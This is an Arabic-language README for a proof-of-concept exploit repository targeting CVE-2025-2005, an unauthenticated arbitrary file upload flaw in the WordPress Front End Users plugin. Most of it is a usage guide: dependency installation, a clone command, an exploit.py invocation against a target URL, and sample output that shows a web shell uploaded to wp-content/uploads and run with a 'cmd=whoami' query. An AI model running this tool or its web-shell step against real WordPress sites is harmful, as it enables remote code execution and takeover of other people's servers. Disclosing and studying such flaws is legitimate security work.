
استغلال ثغرة رفع الملفات التعسفي في WordPress FEUP (CVE-2025-2005)
يوفر هذا المستودع استغلالًا (PoC) لإثبات المفهوم للمكوّن الإضافي Front End Users في WordPress (الإصدارات حتى 3.2.32)، والذي يعاني من ثغرة رفع ملفات تعسفي بسبب غياب التحقق من نوع MIME/نوع الملف في نموذج التسجيل الخاص به. يسمح ذلك للمهاجمين غير المصادَق عليهم برفع ملفات خبيثة (مثل أغلفة الويب)، مما قد يؤدي إلى تنفيذ تعليمات برمجية عن بُعد (RCE) على الخادم.
/register/
/signup/
pip install requests beautifulsoup4
https://github.com/mrmtwoj/CVE-2025-2005.git
cd CVE-2025-2005
python3 exploit.py --url http://target.com --user hacker --password pass123
[*] Scanning site: http://victim.com
[*] Found 17 pages.
[+] Registration form found at: http://victim.com/register
[*] Uploading shell...
[+] Shell uploaded successfully!
Location ::
http://victim.com/wp-content/uploads/shell.php
http://victim.com/wp-content/uploads/ewd-feup-user-uploads/shell.php
RUN ::
http://victim.com/wp-content/uploads/shell.php?cmd=whoami